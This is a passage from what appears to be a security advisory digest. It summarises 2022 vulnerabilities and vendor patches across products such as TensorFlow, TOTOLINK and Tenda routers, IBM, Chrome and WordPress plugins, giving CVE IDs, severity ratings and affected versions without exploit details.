components that affect Dell NetWorker vProxy. The affected versions are Dell NetWorker
vProxy 4.3.0-31 and earlier.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Festo control block CPX-CEC-C1 and CPX-CMXX allow
unauthenticated, remote access to critical webpage functions which can cause a Denial of
Service (DoS). The affected versions are Control block CPX-CEC-C1 2.0.12 and below, and
Control block CPX-CMXX 1.2.34 rev.404 and below.
CVE ID: CVE-2022-3079
TensorFlow has released a security update to address a vulnerability that either writes
content at the wrong index or triggers a crash. The affected versions are TensorFlow 2.9.1,
TensorFlow 2.8.1, and TensorFlow 2.7.2.
CVE ID: CVE-2022-35939 (Critical)
TensorFlow has released a security update to address a vulnerability that leads to an
out-of-bounds memory read or a crash. The affected versions are TensorFlow 2.9.1, TensorFlow
2.8.1, and TensorFlow 2.7.2.
CVE ID: CVE-2022-35938 (Critical)
TensorFlow has released a security update to address a vulnerability that leads to an
out-of-bounds memory read. The affected versions are TensorFlow 2.9.1, TensorFlow 2.8.1, and
TensorFlow 2.7.2.
CVE ID: CVE-2022-35937 (Critical)
A vulnerability has been discovered in the iAware module while managing malicious apps.
Successful exploitation of this vulnerability can cause malicious apps to automatically
start upon system startup.
CVE ID: CVE-2022-39000 (Critical)
An improper update of reference count vulnerability has been discovered in the AOD module.
Successful exploitation of this vulnerability can affect data integrity, confidentiality,
and availability.
CVE ID: CVE-2022-38999 (Critical)
A Remote Code Execution vulnerability has been discovered in the Tenhot router. The affected
version is Tenhot TWS-100 V4.0-201809201424.
CVE ID: CVE-2022-37861 (Critical)
A vulnerability has been discovered in Airties Smart Wi-Fi that allows attackers to change
the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure
Direct Object Reference. The affected versions are Airties Smart Wi-Fi before 2020-08-04.
CVE ID: CVE-2022-38789 (Critical)
An Authentication Bypass by Primary Weakness vulnerability has been discovered in the GitHub
repository bookwyrm-social/bookwyrm. The affected versions are those prior to 0.4.5.
CVE ID: CVE-2022-2651 (Critical)
Dataprobe has released a security update to address multiple vulnerabilities in its equipment-
iBoot-PDU FW. Successful exploitation of these vulnerabilities can lead to unauthenticated
remote code execution on the Dataprobe iBoot-PDU device.
CVE ID: CVE-2022-3183 (Critical), CVE-2022-3184 (Critical), CVE-2022-3185 (Medium),
CVE-2022-3186 (High), CVE-2022-3187 (Medium), CVE-2022-3188 (Medium), CVE-2022-3189
(Medium)
MiCODUS has released a security update to address multiple vulnerabilities in its equipment-
MV720 GPS tracker. Successful exploitation of these vulnerabilities can give an attacker
control over any MV720 GPS tracker, granting access to location, routes, fuel cutoff
commands, and the disarming of various features (e.g., alarms).
CVE ID: CVE-2022-2107 (Critical), CVE-2022-2141 (Critical), CVE-2022-2199 (High),
CVE-2022-34150 (High), CVE-2022-33944 (Medium)
OWASP ModSecurity Core Rule Set (CRS) has released security updates to address multiple
vulnerabilities in CRS. The affected versions are legacy CRS versions 3.0.x, 3.1.x, 3.2.1
and 3.3.2.
CVE ID: CVE-2022-39955 (Critical), CVE-2022-39956 (Critical), CVE-2022-39957 (High),
CVE-2022-39958 (High)
Delta Electronics has released a security update to address a use of hard-coded credentials
vulnerability in its equipment- DIAEnergie that can lead to Remote Code Execution (RCE). The
affected products are DIAEnergie version 1.8.0 and prior.
CVE ID: CVE-2022-3214 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
91.13.1. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-3033 (High), CVE-2022-3032 (Medium), CVE-2022-3034
(Medium)
Moodle has released security updates to address multiple vulnerabilities in several
products.
CVE ID: CVE-2022-40316, CVE-2022-40315, CVE-2022-40314, CVE-2022-40313
Spring has released security updates to address a vulnerability in Spring Data REST. The
affected products are Spring Data REST 3.6.0 to 3.6.6, 3.7.0 to 3.7.2 and older, unsupported
versions.
CVE ID: CVE-2022-31679 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A SQL injection vulnerability has been discovered in the Northstar Club Management
application. The affected version is Northstar Club Management version 6.3.
CVE ID: CVE-2022-26959 (Critical)
A buffer overflow vulnerability has been discovered in Tenda WiFi Routers. The affected
versions are Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router
V15.03.05.19_multi.
CVE ID: CVE-2022-38326 (Critical)
A buffer overflow vulnerability has been discovered in Tenda WiFi Routers. The affected
versions are Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router
V15.03.05.19_multi.
CVE ID: CVE-2022-38325 (Critical)
An out-of-bounds read vulnerability has been discovered in the DNS proxy of Connman. The
affected versions are Connman through 1.40.
CVE ID: CVE-2022-23097 (Critical)
An out-of-bounds read vulnerability has been discovered in the DNS proxy of Connman. The
affected versions are Connman through 1.40.
CVE ID: CVE-2022-23096 (Critical)
A SQL injection vulnerability has been discovered in Gestionnaire Libre de Parc Informatique
(GLPI). The updates are available.
CVE ID: CVE-2022-35947 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A command injection vulnerability has been discovered in TOTOLINK. The affected version is
TOTOLINK T6 V4.1.5cu.709_B20210518.
CVE ID: CVE-2022-38828 (Critical)
A buffer overflow vulnerability has been discovered in TOTOLINK. The affected version is
TOTOLINK T6 V4.1.5cu.709_B20210518.
CVE ID: CVE-2022-38827 (Critical)
An arbitrary command execution vulnerability has been discovered in TOTOLINK. The affected
version is TOTOLINK T6 V4.1.5cu.709_B20210518.
CVE ID: CVE-2022-38826 (Critical)
A hard-coded password vulnerability has been discovered in TOTOLINK. The affected version is
TOTOLINK T6 V4.1.5cu.709_B20210518.
CVE ID: CVE-2022-38823 (Critical)
A vulnerability has been discovered in the component post_applogin.php of Super Flexible
Software for Syncovery. The affected versions are Syncovery 9 for Linux v9.47x and below.
CVE ID: CVE-2022-36536 (Critical)
A command injection vulnerability has been discovered in TOTOLink. The affected version is
TOTOLink A700RU V7.4cu.2313_B20191024. This vulnerability allows attackers to execute
arbitrary commands via a crafted payload.
CVE ID: CVE-2022-38308 (Critical)
A Remote Code Execution vulnerability via the ping host feature has been discovered in SmartRG
routers. The affected versions are SmartRG SR506n 2.5.15 and SR510n 2.6.13.
CVE ID: CVE-2022-37661 (Critical)
It has been discovered that the mobile application in Transtek Mojodat FAM (Fixed Asset
Management) allows remote attackers to bypass authorization. The affected version is
Transtek Mojodat FAM 2.4.6.
CVE ID: CVE-2022-38768 (Critical)
Dell has released a security update to address a vulnerability in Advanced Message Queuing
Protocol (AMQP), a third-party component, that affects Dell NetWorker.
CVE ID: CVE-2018-11050 (High)
ASUS has released security updates to address multiple vulnerabilities in ASUS personal
computers, including desktops, laptops and All-in-One PCs.
CVE ID: CVE-2022-36438, CVE-2022-36439
An Improper Access Control vulnerability has been discovered in Siemens Mobility's equipment-
CoreShield One-Way Gateway (OWG) Software. Successful exploitation of this vulnerability can
allow an attacker to leverage the default installation for Windows versions of the
CoreShield (OWG) software, which sets insecure file permissions that can result in local
escalation of privileges to local administrator. The mitigations are available.
CVE ID: CVE-2022-38466 (High)
CISA and the National Security Agency (NSA) have published Open Radio Access Network
Security Considerations. This product assesses the benefits and security considerations
associated with implementing an Open Radio Access Network (Open RAN) architecture.
WordPress has released a security update to address a Directory Traversal vulnerability in
the SearchWP Live Ajax Search plugin for WordPress. The affected versions are SearchWP Live
Ajax Search versions up to and including 1.6.2.
CVE ID: CVE-2022-3227 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Google has released Chrome Beta 106 (106.0.5249.41) for iOS, Stable channel 105.0.5195.134
(Platform version: 14989.107.0) for most ChromeOS devices, Dev Channel 107.0.5300.0 for
Windows, Mac and Linux, Chrome 105 (105.0.5195.136) for Android, and Chrome Dev 107
(107.0.5299.0) for Android.
Debian has released a security update to address multiple vulnerabilities in Chromium, which
can result in the execution of arbitrary code, denial of service or information disclosure.
CVE ID: CVE-2022-3195 (High), CVE-2022-3196 (High), CVE-2022-3197 (High),
CVE-2022-3198 (High), CVE-2022-3199 (High), CVE-2022-3200 (High), CVE-2022-3201
(High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A use-after-free vulnerability has been discovered in the doContent function of
libexpat. The affected versions are libexpat before 2.4.9.
CVE ID: CVE-2022-40674 (Critical)
A SQL Injection vulnerability has been discovered in Loan Management System, which allows
unauthorized users to log in as Administrator by injecting into the username form. The
affected version is Loan Management System 1.0.
CVE ID: CVE-2022-37138 (Critical)
A SQL Injection vulnerability has been discovered in Hospital Information System that allows
for authentication bypass. The affected version is Hospital Information System 1.0.
CVE ID: CVE-2022-36669 (Critical)
An authentication bypass vulnerability has been discovered in OSU Open Source Lab
VNCAuthProxy. The affected versions are OSU Open Source Lab VNCAuthProxy through 1.1.1.
CVE ID: CVE-2022-36436 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in a GitHub repository.
The affected versions are those prior to 8.1.0.
CVE ID: CVE-2022-2900 (Critical)
A SQL injection vulnerability has been discovered in Hospital Management System via the
Username and Password parameters on the Login page. The affected version is Hospital
Management System v1.0.
CVE ID: CVE-2022-38637 (Critical)
An authentication bypass vulnerability has been discovered in UCMS, which is exploited via
cookie poisoning. The affected version is UCMS v1.6.0.
CVE ID: CVE-2022-38297 (Critical)
An arbitrary file upload vulnerability via the File Manager has been discovered in Cuppa
CMS. The affected version is Cuppa CMS v1.0.
CVE ID: CVE-2022-38296 (Critical)
A pre-authentication command injection vulnerability has been discovered in the web
configuration interface of the TP-Link M7350 V3 with firmware version 190531.
CVE ID: CVE-2022-37860 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in SLiMS Senayan
Library Management System. The affected version is SLiMS Senayan Library Management System
v9.4.2.
CVE ID: CVE-2022-38292 (Critical)
An improper restriction of XML External Entity Reference (XXE) vulnerability has been
discovered in the Policy Engine of Forcepoint Data Loss Prevention (DLP). The affected
products are Forcepoint Data Loss Prevention (DLP) versions prior to 8.8.2, Forcepoint One
Endpoint (F1E) with Policy Engine versions prior to 8.8.2, Forcepoint Web Security Content
Gateway versions prior to 8.5.5, Forcepoint Email Security with DLP enabled versions prior
to 8.5.5, and Forcepoint Cloud Security Gateway prior to June 20, 2022.
CVE ID: CVE-2022-1700 (Critical)
A protection mechanism bypass vulnerability has been discovered in Pebble Templates that
allows arbitrary code execution with springbok. The affected version is Pebble Templates
3.1.5.
CVE ID: CVE-2022-37767 (Critical)
An arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource
has been discovered in Casdoor. The affected version is Casdoor v1.97.3.
CVE ID: CVE-2022-38638 (Critical)
OpenAM Consortium has released a security update to address an open redirect vulnerability
in OpenAM (OpenAM Consortium Edition). The affected version is OpenAM (OpenAM Consortium
Edition) 14.0.0.
CVE ID: CVE-2022-31735 (Medium)
EC-CUBE has released security updates to resolve multiple vulnerabilities in EC-CUBE
products. The affected versions are EC-CUBE 3.0.0 to 3.0.18-p4 (EC-CUBE 3 series), and
EC-CUBE 4.0.0 to 4.1.2 (EC-CUBE 4 series).
CVE ID: CVE-2022-40199 (Low), CVE-2022-38975 (Medium)
EC-CUBE has released security updates to resolve an insufficient verification vulnerability
when uploading files in EC-CUBE Product Image Bulk Upload Plugin. The affected versions are
Product Image Bulk Upload Plugin 1.0.0, and Product Image Bulk Upload Plugin 4.1.0.
CVE ID: CVE-2022-37346 (Medium)
Ubuntu has released security updates to address a vulnerability in Intel Microcode that can
allow SGX enclaves to be compromised. The affected products are Ubuntu 22.04 LTS, Ubuntu
20.04 LTS & Ubuntu 18.04 LTS.
CVE ID: CVE-2022-21233 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20846 (Medium), CVE-2022-20845 (Medium), CVE-2022-20849
(Medium)
Palo Alto Networks has released security updates to resolve multiple vulnerabilities in
Cortex XDR Agent. For information, PAN-OS software is unaffected by the NVIDIA Dataplane
Development Kit (DPDK) vulnerability (CVE-2022-28199), which does not impact Palo Alto
Networks PA-Series (hardware) firewalls, VM-Series (virtual) firewalls, CN-Series (container)
firewalls, Panorama virtual appliances, Panorama M-Series appliances, Cloud NGFW customers,
or Prisma Access customers.
CVE ID: CVE-2022-0029 (Medium)
Dell has released a security update to address a regular expression Denial of Service (DoS)
vulnerability in Dell Wyse ThinOS. The affected versions are Dell Wyse ThinOS 9.3.1129 and
earlier versions.
CVE ID: CVE-2022-34402 (Medium)
Google has released Chrome Beta 106 (106.0.5249.38) for Android, Beta channel 106.0.5249.36
(Platform version: 15054.50.0/15054.51.0) for most ChromeOS devices, Beta channel
106.0.5249.40 for Windows, Mac & Linux, and Stable channel 105.0.5195.125 for Mac & Linux to
resolve multiple vulnerabilities.
CVE ID: CVE-2022-3196 (High), CVE-2022-3197 (High), CVE-2022-3198 (High),
CVE-2022-3199 (High), CVE-2022-3200 (High), CVE-2022-3201 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been observed that threat actors are exploiting multiple vulnerabilities in Fortinet
FortiOS and Microsoft Exchange servers for data extortion and disk encryption for ransom
operations.
CVE ID: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34473,
CVE-2021-34523, CVE-2021-31207
Microsoft has released security updates to address multiple
vulnerabilities in its products. An attacker can exploit these vulnerabilities to take
control of an affected system.
Multiple SQL injection vulnerabilities have been discovered in Archery. The affected
versions are Archery v1.8.3 to v1.8.5.
CVE ID: CVE-2022-38541 (Critical)
A SQL injection vulnerability has been discovered in Library Management System. The affected
version is Library Management System 1.0.
CVE ID: CVE-2022-37794 (Critical)
An XML External Entity vulnerability has been discovered in Apache Calcite. The affected
versions are Apache Calcite versions prior to 1.32.0.
CVE ID: CVE-2022-39135 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in the Rank Math SEO
plugin for WordPress. The affected versions are Rank Math SEO plugin 1.0.95 and below.
CVE ID: CVE-2022-36376 (Critical)
XWiki has released security updates to address a vulnerability in XWiki Platform Web Parent
POM. The affected versions are XWiki 1.0 and prior to versions 13.10.6 and 14.30-rc-1.
CVE ID: CVE-2022-36094 (Critical)
It has been discovered that Inoda OnTrack employs a weak password policy which allows
attackers to potentially gain unauthorized access to the application via brute-force attacks.
The affected version is Inoda OnTrack v3.4.
CVE ID: CVE-2022-37164 (Critical)
Multiple improper access control vulnerabilities have been discovered in Zoom On-Premise
Meeting Connector MMR. The affected versions are Zoom On-Premise Meeting Connector MMR
before version 4.8.20220815.130.
CVE ID: CVE-2022-28760 (Medium), CVE-2022-28758 (High), CVE-2022-28759
(High)
Debian has released a security update to address multiple vulnerabilities in FreeCAD
package, which can result in the execution of arbitrary shell commands when opening a
malformed file.
CVE ID: CVE-2021-45844 (High), CVE-2021-45845 (High)
Honeywell has released security updates to address multiple vulnerabilities in its
equipment- SoftMaster. Successful exploitation of these vulnerabilities can allow code
execution in the context of the application permissions or escalation of privileges.
CVE ID: CVE-2022-2333 (High), CVE-2022-2332 (Medium)
Adobe has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
Citrix has released a security update to address a vulnerability in Citrix Hypervisor 8.2 LTSR
CU1 Hotfix XS82ECU1008 (only) that can allow malicious network traffic to cause subsequent
packets to be dropped.
CVE ID: CVE-2020-35498 (High)
Dell has released security updates to resolve multiple vulnerabilities in third party
components used in Dell NetWorker vProxy. The affected versions are NetWorker vProxy
4.3.0-22 and earlier.
Google has released Chrome Stable 105 (105.0.5195.129) for iOS, Extended Stable channel
104.0.5112.124 for Windows & 104.0.5112.123 for Mac, and Chrome 105 (105.0.5195.124) for
Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-2191 (High), CVE-2022-31160 (Medium), CVE-2022-2047 (Low),
CVE-2022-2048 (High)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Internet Key Exchange (IKE) Protocol Extensions affecting multiple
Windows products.
CVE ID: CVE-2022-34722 (Critical)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Internet Key Exchange (IKE) Protocol Extensions affecting multiple
Windows products.
CVE ID: CVE-2022-34721 (Critical)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows TCP/IP affecting multiple Windows products.
CVE ID: CVE-2022-34718 (Critical)
XWiki has released security updates to address a vulnerability in XWiki Platform Mentions
UI. The affected versions are XWiki 12.5-rc-1 and prior to versions 13.10.6 and 14.4.
CVE ID: CVE-2022-36098 (Critical)
XWiki has released security updates to address a vulnerability in XWiki Platform Mentions
UI. The affected versions are XWiki prior to versions 13.10.6 and 14.3.
CVE ID: CVE-2022-36096 (Critical)
It has been discovered that Bminusl IHateToBudget employs a weak password policy, which
allows unauthorized access to the application to be gained via brute-force attacks. The
affected version is Bminusl IHateToBudget v1.5.7.
CVE ID: CVE-2022-37163 (Critical)
QNAP NAS has released security updates to address an externally controlled reference to a
resource vulnerability that affects QNAP NAS running Photo Station. The affected products
are QTS 5.0.1: Photo Station 6.1.2 and later, QTS 5.0.0/4.5.x: Photo Station 6.0.22 and
later, QTS 4.3.6: Photo Station 5.7.18 and later, QTS 4.3.3: Photo Station 5.4.15 and later,
and QTS 4.2.6: Photo Station 5.2.14 and later.
CVE ID: CVE-2022-27593 (Critical)
Delta Industrial Automation has released a security update to address a use of hard-coded
credentials vulnerability in its equipment- DIAEnergie that can lead to Remote Code
Execution (RCE). The affected products are DIAEnergie version 1.8.0 and prior.
An improper authentication vulnerability has been discovered in Kingspan's equipment- TMS300
CS, which does not properly restrict access to endpoints. Successful exploitation of this
vulnerability can allow application settings to be viewed and modified without authenticating.
CVE ID: CVE-2022-2757 (Critical)
Trend Micro has released security updates to address a vulnerability in Trend Micro Apex One
and Trend Micro Apex One as a Service that allows logging in to the product's administration
console and executing arbitrary code.
CVE ID: CVE-2022-40139 (High)
Schneider Electric has released security updates to resolve multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released security updates to address multiple vulnerabilities in Dell BSAFE SSL-J,
Dell BSAFE Crypto-J, and Dell AppSync.
CVE ID: CVE-2021-46827 (Medium)
Apple has released the latest versions of Safari 16 for macOS Big Sur & macOS Monterey, tvOS 16
for Apple TV 4K, Apple TV 4K (2nd generation), & Apple TV HD, watchOS 9 for Apple Watch
Series 4 & later, iOS 16 for iPhone 8 & later, macOS Monterey 12.6 for macOS Monterey, macOS
Big Sur 11.7 for macOS Big Sur, and iOS 15.7 and iPadOS 15.7 for iPhone 6s & later, iPad Pro
(all models), iPad Air 2 & later, iPad 5th generation & later, iPad mini 4 & later, and iPod
touch (7th generation) to resolve multiple vulnerabilities.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A stack buffer overflow vulnerability has been discovered in xhyve commit dfbe09b via the
component pci_vtrnd_notify().
CVE ID: CVE-2022-36660 (Critical)
A heap-based buffer over-read or buffer overflow vulnerability has been discovered in zlib.
The affected version is zlib through 1.2.12.
CVE ID: CVE-2022-37434 (Critical)
Ubuntu has released security updates to address multiple vulnerabilities in LibTIFF that can
cause Denial of Service (DoS) or expose sensitive information. The affected products are
Ubuntu 18.04 LTS & Ubuntu 20.04 LTS.
CVE ID: CVE-2022-0907 (Medium), CVE-2022-0908 (Medium), CVE-2022-0909 (Medium),
CVE-2022-0924 (Medium), CVE-2022-22844 (Medium)
Debian has released a security update to address multiple heap-based buffer overflow
vulnerabilities in gdk-pixbuf package, which can result in the execution of arbitrary code
or Denial of Service (DoS) if a malformed GIF image is processed.
CVE ID: CVE-2021-44648 (High), CVE-2021-46829 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2018-1285 (Critical), CVE-2019-17498 (High), CVE-2022-2191 (High),
CVE-2022-31144 (High), CVE-2022-31151 (Medium), CVE-2022-31160 (Medium), CVE-2022-36313
(Medium), CVE-2022-2047 (Low), CVE-2022-2048 (High), CVE-2022-1651 (High), CVE-2022-25647
(High), CVE-2022-37434 (Critical), CVE-2022-31097 (Medium), CVE-2022-31107 (High),
CVE-2022-36879 (Medium), CVE-2022-36946 (High)
ARK-Web has released security updates to address a cross-site scripting vulnerability in
Movable Type plugin A-Form. The affected versions are A-Form versions prior to 4.1.1 (for
Movable Type 7 Series), and A-Form versions prior to 3.9.1 (for Movable Type 6 Series).
CVE ID: CVE-2022-38972 (Medium)
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel for
Microsoft Azure CVM cloud systems that can cause a Denial of Service (DoS) or possibly
execute arbitrary code. The affected product is Ubuntu 20.04 LTS.
CVE ID: CVE-2021-33061 (Medium), CVE-2021-33656 (High)
A Denial of Service (DoS) vulnerability has been discovered in bundled Jetty that affects
Jenkins. The affected products are Jenkins LTS 2.346.3 & earlier and Jenkins weekly up to
and including 2.362, which bundle affected versions of Jetty. The updates are available.
CVE ID: CVE-2022-2048 (High)
Dell has released security updates to address a vulnerability in Oxygen XML WebHelp, a
third-party component, that affects Dell Unisphere for PowerMax, Dell Unisphere for PowerMax
Virtual Appliance, Dell Solutions Enabler Virtual Appliance, Dell eVASA Provider Virtual
Appliance, Dell VASA Provider Standalone, and Dell PowerMaxOS.
CVE ID: CVE-2021-46827 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Unauthenticated plugin settings change & data deletion vulnerabilities have been
discovered in the WP Shop plugin for WordPress. The affected versions are WP Shop plugin 3.9.6
and below.
CVE ID: CVE-2022-36793 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in Canto Cumulus that
allows attackers to enumerate the internal network, overload network resources, and possibly
have unspecified other impact. The affected versions are Canto Cumulus through 11.1.3.
CVE ID: CVE-2022-40305 (Critical)
A buffer overflow vulnerability has been discovered in D-Link. The affected version is
D-Link DAP1650 v1.04 firmware.
CVE ID: CVE-2022-36588 (Critical)
A buffer overflow vulnerability has been discovered in Tenda. The affected version is Tenda
G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE.
CVE ID: CVE-2022-36586 (Critical)
A buffer overflow vulnerability has been discovered in Tenda. The affected version is Tenda
G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE.
CVE ID: CVE-2022-36585 (Critical)
A SQL injection vulnerability has been discovered in Nagios XI via the mib_name parameter at
the Manage MIBs page. The affected version is Nagios XI v5.8.6.
CVE ID: CVE-2022-38250 (Critical)
It has been discovered that Gluu Oxauth allows blind Server-Side Request Forgery (SSRF)
attacks via a crafted request_uri parameter. The affected versions are Gluu Oxauth
before v4.4.1.
CVE ID: CVE-2022-36663 (Critical)
A deserialization of untrusted data vulnerability has been discovered in the message
processing component of Bitdefender GravityZone Console, which allows unsafe commands to
be passed to the environment. The affected versions are Bitdefender GravityZone Console
On-Premise versions prior to 6.29.2-1, and Bitdefender GravityZone Cloud Console versions
prior to 6.27.2-2.
CVE ID: CVE-2022-2830 (Critical)
A session fixation vulnerability has been discovered in Apache Airflow. The affected
versions are Apache Airflow 2.2.4 through 2.3.3.
CVE ID: CVE-2022-38054 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Baxter has released security updates and mitigations to resolve multiple vulnerabilities in
its equipment, the Sigma and Baxter Spectrum Infusion Pumps. Successful exploitation of
these vulnerabilities can result in access to sensitive data and alteration of system
configuration.
CVE ID: CVE-2022-26390 (Medium), CVE-2022-26392 (Medium), CVE-2022-26393 (Medium),
CVE-2022-26394 (Medium)
Hillrom has released security updates to address out-of-bounds write and out-of-bounds read
vulnerabilities in its equipment, the Welch Allyn medical device management tools.
Successful exploitation of these vulnerabilities can allow an attacker to cause memory
corruption and remotely execute arbitrary code.
CVE ID: CVE-2021-27408 (Medium), CVE-2021-27410 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
NETGEAR has released a security update to address multiple vulnerabilities in FunJSQ, a
third-party module integrated on some routers and Orbi WiFi Systems.
A missing access control vulnerability has been discovered in the PHP Crafts Accommodation
System plugin. The affected versions are PHP Crafts Accommodation System plugin 1.0.1 and
below.
CVE ID: CVE-2022-37344 (Critical)
A missing access control vulnerability has been discovered in the About Rentals plugin for
WordPress. The affected versions are About Rentals plugin 1.5 and below.
CVE ID: CVE-2022-36427 (Critical)
A broken access control vulnerability has been discovered in Alessio Caiazza's About Me
plugin for WordPress. The affected versions are Alessio Caiazza's About Me plugin 1.0.12
and below.
CVE ID: CVE-2022-36387 (Critical)
A broken access control vulnerability has been discovered in the Beaver Builder plugin for
WordPress. The affected versions are Beaver Builder plugin 2.5.4.3 and below.
CVE ID: CVE-2022-36425 (Critical)
A vulnerability has been discovered in OpenRemote that allows attackers to execute arbitrary
code via a crafted Groovy rule. The affected versions are OpenRemote through 1.0.4.
CVE ID: CVE-2022-31860 (Critical)
It has been discovered that Eclipse TCF debug interface in JasMiner-X4-Server is open on
port 1534. This vulnerability allows unauthenticated attackers to gain root privileges on
the affected device and access sensitive data or execute arbitrary commands. The affected
versions are Eclipse TCF debug interface in JasMiner-X4-Server-20220621-090907 and below.
CVE ID: CVE-2022-36601 (Critical)
A format string vulnerability has been discovered in Zyxel NAS326 firmware that allows an
attacker to achieve unauthorized remote code execution via a crafted UDP packet. The
affected versions are Zyxel NAS326 firmware versions prior to V5.21(AAZF.12)C0.
CVE ID: CVE-2022-34747 (Critical)
Apache OFBiz has released a security update for the Solr plugin to address a vulnerability.
An attacker can exploit this vulnerability at server start-up or on a server restart in
order to run arbitrary code. The affected versions are OFBiz prior to 18.12.06.
CVE ID: CVE-2022-29063 (Critical)
A buffer overflow vulnerability has been discovered in Tenda. The affected version is Tenda
G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE.
CVE ID: CVE-2022-36584 (Critical)
MZ Automation GmbH has released security updates to resolve multiple vulnerabilities in its
equipment, libIEC61850. Successful exploitation of these vulnerabilities can crash the
device being accessed, and buffer overflow conditions can allow remote code execution.
CVE ID: CVE-2022-2970 (Critical), CVE-2022-2972 (Critical), CVE-2022-2971 (High),
CVE-2022-2973 (High)
Apache has released security updates to address a Denial of Service (DoS) vulnerability in
Apache Struts 2. The affected versions are Struts 2.0.0 to 2.5.20.
CVE ID: CVE-2019-0233 (Medium)
An access bypass vulnerability has been discovered in Permissions by Term, and Next.js,
third-party libraries used by Drupal. The updates are available.
Ubuntu has released security updates to address a vulnerability in the Dnsmasq package that
can enable DNS cache poisoning attacks. The affected product is Ubuntu 16.04 ESM.
CVE ID: CVE-2021-3448 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20696 (High), CVE-2022-28199 (High), CVE-2022-20863 (Medium),
CVE-2022-20923 (Medium)
Google has released Chrome Beta 106 (106.0.5249.30) for iOS, Chrome Beta 106 (106.0.5249.31)
for Android, Beta channel 106.0.5249.30 for Windows, Mac and Linux, and Stable channel
105.0.5195.112 (Platform version: 14989.85.0) for most ChromeOS devices to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-3071 (High), CVE-2022-3052 (Medium), CVE-2022-2859
(Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to address a deserialization vulnerability in
libgoogle-gson-java package that can lead to a Denial of Service (DoS) or even the execution
of arbitrary code.
CVE ID: CVE-2022-25647 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-1651 (High), CVE-2021-33149 (Low), CVE-2022-24436 (Medium),
CVE-2021-0060 (High), CVE-2021-0127 (Medium), CVE-2020-12357 (High), CVE-2020-12358
(Medium), CVE-2020-12359 (High), CVE-2020-12360 (Medium), CVE-2020-24486 (Medium),
CVE-2020-8670 (High), CVE-2020-8700 (High), CVE-2020-24511 (Medium), CVE-2020-24512
(Low)
A local file disclosure vulnerability has been discovered in Telos Alliance Omnia MPX Node,
which allows attackers to escalate privileges to root and execute arbitrary commands. The
affected versions are Telos Alliance Omnia MPX Node through 1.5.0+r1.
CVE ID: CVE-2022-36642 (Critical)
A SQL injection vulnerability has been discovered in Online Food Ordering System. The
affected version is Online Food Ordering System v1.0.
CVE ID: CVE-2022-36759 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Apache OFBiz. The
affected versions are Apache OFBiz release 18.12.05 and earlier.
CVE ID: CVE-2022-25371 (Critical)
It has been discovered that in D-Link DIR-816 A2_v1.10CNB04.img the network can be
initialized without authentication via /goform/wizard_end.
CVE ID: CVE-2022-37128 (Critical)
A command injection vulnerability has been discovered in Rpi-Jukebox-RFID. The affected
version is RPi-Jukebox-RFID v2.3.0.
CVE ID: CVE-2022-36749 (Critical)
